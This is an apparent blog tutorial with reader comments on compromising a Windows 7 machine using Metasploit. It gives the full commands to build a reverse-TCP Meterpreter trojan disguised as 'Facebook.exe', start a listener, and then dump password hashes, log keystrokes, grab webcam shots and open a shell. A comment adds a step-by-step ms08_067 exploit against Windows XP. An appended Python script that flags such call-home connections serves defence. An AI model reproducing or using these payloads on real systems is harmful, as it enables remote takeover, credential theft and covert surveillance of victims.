Saturday, 10 December 2011

Exploiting Windows 7 with Metasploit/BackTrack 5

So I'm going to take some time to show you how to exploit a Windows 7 machine using Metasploit. Please note that this is just a simple demonstration and, as such, my victim PC has Windows Firewall disabled and no antivirus in place. Either of these measures would easily prevent this exploit from working. I am also assuming that you already have network connectivity between the victim and the hacker PC. Here are the details of my setup:

Victim PC = My host machine running Windows 7
Victim PC IP address =

Hacker PC = VMWare Workstation running a BackTrack 5 virtual machine
Hacker PC IP address =

To get started, we're going to open up a terminal in BackTrack and navigate to the Metasploit directory. The command to do this is cd /opt/framework/msf3

Next we're going to create our payload and export it as an .exe file that will make the connection between the hacker and the victim. The command to create the payload is ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /root/Desktop/Facebook.exe (the option is an uppercase X, which tells msfpayload to write a Windows executable)

Note: in this command, replace the address of MY hacker PC with the address of YOUR hacker PC. Leave everything else the same.

This command will create the file called Facebook.exe and place it on the Desktop of our BackTrack VM. In a real-life scenario you'd now have to figure out a way to get that file onto the victim's PC and get them to run it. In this case, however, I'm just going to drag the file out of my virtual machine and onto the desktop of my host machine (DO NOT RUN Facebook.exe YET!). You should be at this point now:

So now the setup phase is done: we've created our payload and figured out a way to get the file onto the victim's computer, and we are ready for the actual exploit to take place.

At this point you're going to use the command ./msfconsole to launch Metasploit. This may take a while to load, especially if it's your first time launching the program. After Metasploit launches you should see a screen similar to this:

Now we're going to type the command use exploit/multi/handler and press Enter. Then we will type set LHOST followed by the hacker PC's address and press Enter. Then type set LPORT 4444 and press Enter. Again, remember to change the address to match that of your OWN hacker PC, but leave the port number the same.

Now if you type the command exploit and press Enter, Metasploit will start the payload handler. This opens a listener on our hacker machine on port 4444 and waits for a connection from the victim's PC (which is made when they open the Facebook.exe file).

So at this point your screen should look like this:

Now the fun begins... if you double-click on the Facebook.exe file we copied to the Windows 7 victim PC, the payload handler in Metasploit will receive the connection and connect you to the victim PC. You should see something like this:

You now have a Meterpreter prompt, which essentially gives you control of the victim's machine. You can issue the command help at the Meterpreter prompt for a list of some of the cool things you can do to the victim, but here is a list of the more common ones:

sysinfo - get basic system info
hashdump - dumps the SAM database
screenshot - takes a screenshot of the victim's desktop
webcam_snap - takes a snapshot from the victim's webcam
keyscan_start - start key-logging
keyscan_dump - dump the keystrokes (after using keyscan_start)
ps - list all running processes
shell - gives you a command shell on the victim's PC

So that's pretty much it... this is just one of the many ways to exploit a machine using Metasploit. Let me know if you have any questions or comments.
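From the defender's side, the two things that give this demo away are a freshly dropped executable in a user-writable folder and an outbound connection to an unusual port (4444 here, the handler's LPORT). As an added example that is not part of the original post, here is a small Python scoring rule run over constructed Sysmon-style network-connection records (the events, hostnames and addresses are made up; the port list and paths are assumptions you would tune for your own network):

```python
"""Score outbound connections for signs of a dropped reverse-TCP stager calling home.
Added defensive example; input is constructed Sysmon-style (Event ID 3) data, not real telemetry."""
import re

# Constructed sample events; the second one models the Facebook.exe stager from the post.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\svchost.exe User=NT AUTHORITY\SYSTEM DestinationIp=10.0.0.5 DestinationPort=443 Initiated=true",
    r"Image=C:\Users\victim\Desktop\Facebook.exe User=WIN7\victim DestinationIp=192.168.56.101 DestinationPort=4444 Initiated=true",
    r"Image=C:\Program Files\Mozilla Firefox\firefox.exe User=WIN7\victim DestinationIp=93.184.216.34 DestinationPort=80 Initiated=true",
    r"Image=C:\Users\victim\AppData\Local\Temp\setup.exe User=WIN7\victim DestinationIp=10.0.0.9 DestinationPort=8443 Initiated=true",
    r"Image=C:\Users\victim\Downloads\installer.exe User=WIN7\victim DestinationIp=10.0.0.7 DestinationPort=443 Initiated=true",
]

HANDLER_PORTS = {4444}              # the post's LPORT; a handler can listen anywhere, so only a weak signal
COMMON_PORTS = {80, 443, 53, 445}   # ports where outbound workstation traffic is routine (assumed list)
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(desktop|downloads|appdata\\local\\temp)\\", re.I)
FIELD = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")   # Key=value pairs; values may contain spaces

def parse_event(line):
    """Split one 'Key=value Key=value' record into a dict."""
    return {k: v for k, v in FIELD.findall(line)}

def score(event):
    """Return (score, reasons). Higher means more like a dropped stager calling home."""
    if event.get("Initiated", "").lower() != "true":
        return 0, []                            # inbound connection: not a call-home
    port = int(event.get("DestinationPort", 0))
    checks = [   # (weight, reason, hit)
        (2, "runs from a user-writable path", bool(USER_WRITABLE.match(event.get("Image", "")))),
        (1, "default Metasploit handler port", port in HANDLER_PORTS),
        (1, "uncommon destination port", port not in COMMON_PORTS),
    ]
    reasons = [why for w, why, hit in checks if hit]
    return sum(w for w, why, hit in checks if hit), reasons

def detect(lines, threshold=3):
    """Events scoring at or above threshold, highest first, as (image, score, reasons)."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        total, why = score(ev)
        if total >= threshold:
            hits.append((ev["Image"], total, why))
    return sorted(hits, key=lambda h: -h[1])

if __name__ == "__main__":
    for image, total, why in detect(SAMPLE_EVENTS):
        print(f"{total} {image}: {'; '.join(why)}")
```

The Downloads\installer.exe event scores 2 and stays below the threshold, which is the point of weighting: an executable in a user folder talking to 443 is normal, the same executable talking to 4444 is not.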


  1. cd /opt/framework/msf3 (No Such file or Directory)
    what do?

  2. Make sure you're running BackTrack or have Metasploit installed and updated, with all frameworks added to the list
    msf > version
    Framework: 4.1.1-release.14072
    Console : 4.1.1-release.14065
    msf >

  3. what are the widgets that you have going in the lower right corner of BT?

  4. If something can't be found, just open the Terminal prompt, type in locate [SearchString] and hit ENTER.

    [Replace with your search query]

    Example: locate msfconsole

    P.S.: Linux is built around its file system. It's easier to run a command by finding the file itself and opening the file's directory. Click the program file to run it, or just type it in the Terminal. All system files and program files (just like Microsoft Program Files) are stored in the /usr/bin directory. :P

  5. I successfully hacked a Windows 2003 Server machine, but I can't hack Windows XP, Vista or Windows 7. Please help me, guys.

  6. Use the netapi vulnerability to hack Windows XP.....
    step 1: msfconsole
    step 2: search netapi
    step 3: use the vulnerability ms08_067_netapi from the list
    step 4: set LHOST [your local IP address of the BackTrack machine]
    step 5: set RHOST [IP of the target XP machine]
    step 6: set PAYLOAD windows/meterpreter/reverse_tcp
    step 7: exploit

    Hence you get the Meterpreter session of the victim... enjoy... ;)

  7. Shows how good it is to have an antivirus! Nice preview!

  8. I have a question. So if you gained access to a computer (in my case, my Windows 7 virtual machine), can you regain access whenever you want without having to re-click on the Facebook.exe?

  9. Hi, I'm a student in Informatics Engineering. This article is very informative, thanks for sharing :)

  10. Is it possible to do that with a virtual machine? Because after I do "exploit", "no session is created (or found)" is written... please help

  11. Verified Computer Hacking Method...

  12. How can I set up this payload to make it work remotely?

  13. All the characteristics of modern antivirus are quite similar to those of other security programs; all that differs are the functions it performs. If you want more interesting details about antivirus security, you may go here.

  14. We will be getting a reverse TCP connection from the victim machine by using a small backdoor to hack Windows 7 using Metasploit.